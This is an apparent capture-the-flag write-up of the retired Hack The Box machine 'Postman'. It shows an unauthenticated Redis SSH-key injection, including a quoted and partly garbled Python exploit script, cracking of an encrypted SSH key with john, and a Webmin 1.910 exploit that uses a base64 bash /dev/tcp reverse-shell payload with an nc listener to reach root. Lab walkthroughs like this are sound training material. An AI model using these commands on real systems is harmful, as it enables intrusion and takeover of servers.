Name: Postman
Release Date: 02 Nov 2019
Retire Date: 14 Mar 2020
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
sampriti 00 days, 02 hours, 45 mins, 58 seconds
anymuz 00 days, 02 hours, 55 mins, 04 seconds
Creator: TheCyberGeek
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./Postman

$  nmap -sC -sV -Pn -p- -oA ./Postman
Starting Nmap 7.80 ( ) at 2020-07-13 14:05 EDT
Nmap scan report for
Host is up (0.025s latency).
Not shown: 65531 closed ports
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 58.42 seconds


We start with SSH, HTTP, Redis, and MiniServ

 earchsploit Redis
------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                           |  Path
------------------------------------------------------------------------- ---------------------------------
Redis - Replication Code Execution (Metasploit)                          | linux/remote/48272.rb
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)            | linux/remote/47195.rb
Redis 5.0 - Denial of Service                                            | linux/dos/44908.txt

By now, you all know my aversion to Metasploit, but now that I know what to look for, I'm sure I can find a method of exploit outside of MSF.  We come across CVE-2018-12326. So, to start, let's go ahead and install redis on our kali box so we can have the redis-tools for later.  To do that, we run


sudo apt-get install redis


From there, we should be able to use redis-cli to connect to the box with redis-cli -h  Once connected, we can try a CONFIG GET * just to see if we can actually execute anything unauthenticated.  Not surprisingly, we can.

There's 178 or so entries in that command, but we only really needed to know that we could execute.  Running CONFIG GET DIR shows us that we are operating in the /var/lib/redis directory.  Avinash had a pre-built exploit written here, but let's examine what it is actually doing (or it's no better that using MSF).

#Author : Avinash Kumar Thapa aka -Acid
#Twitter :

import os
import os.path
from sys import argv
from termcolor import colored

script, ip_address, username = argv


def ssh_connection():
	shell = "ssh -i " + '$HOME/.ssh/id_rsa ' + username+"@"+ip_address

if os.path.isfile(PATH) or os.path.isfile(PATH1):
    		print colored('\t*******************************************************************', "green")
    		print colored('\t* [+] [Exploit] Exploiting misconfigured REDIS SERVER*' ,"green")
    		print colored('\t* [+] AVINASH KUMAR THAPA aka "-Acid"                                ', "green")
		print colored('\t*******************************************************************', "green")
		print "\n"
		print colored("\t SSH Keys Need to be Generated", 'blue')
		os.system('ssh-keygen -t rsa -C \"acid_creative\"')
		print colored("\t Keys Generated Successfully", "blue")
		os.system("(echo '\r\n\'; cat $HOME/.ssh/; echo  \'\r\n\') > $HOME/.ssh/public_key.txt")
		cmd = "redis-cli -h " + ip_address + ' flushall'
		cmd1 = "redis-cli -h " + ip_address
		cmd2 = "cat $HOME/.ssh/public_key.txt | redis-cli -h " +  ip_address + ' -x set cracklist'
		cmd3 = cmd1 + ' config set dbfilename "backup.db" '
		cmd4 = cmd1 + ' config set  dir' + " /home/"+username+"/.ssh/"
		cmd5 = cmd1 + ' config set dbfilename "authorized_keys" '
		cmd6 = cmd1 + ' save'
		print colored("\tYou'll get shell in sometime..Thanks for your patience", "green")

		print "Something went wrong"
	print colored("\tRedis-cli:::::This utility is not present on your system. You need to install it to proceed further.", "red")


OK. It looks like this script is creating SSH keys and transferring them via redis-cli to the target.  We could do that manually, but as I've said, hackers are lazy creatures.  I'll re-use code/script as long as I understand what it is doing.  That said, that script looks like it needs a valid username on the box, which we don't have. However, checking keys * in redis-cli and using GET cracklist, I can see the key that was created.  Perhaps I can force the connection via key.

Now before I go celebrating, this shell/user cannot do ANYTHING hardly.  Round 2. Jump to /tmp grab and run it thoroughly to see what jumps out.  And it does!  /opt/id_rsa.bak owned by "Matt".  Let's see if we can view it.

So, it's encrypted.  Simple SSH2JOHN command.


sudo /usr/share/john/ key.enc > clearkey.enc


sudo john --wordlist=/usr/share/wordlists/rockyou.txt clearkey.enc


It looks like Matt has a password of computer2008.  Move from redis to Matt and grab the user flag.  There's not a lot more we can do in CLI right now, so let's jump over to port 10000 and it's MiniServ WebMin page.  Logging in with Matt:computer2008, we can grab the Webmin version (1.910) and see what's there.  I eventually come across this Proof of Concept on GitHub and try it out, crafting my payload using:


echo -n 'bash -c "bash -i >& /dev/tcp/ 0>&1"' | base64




nc -lvnp 9999


Let's send it off and see if it works. I did have to change the + signs to %2b's, but after that Boom! We have a winner and a root shell.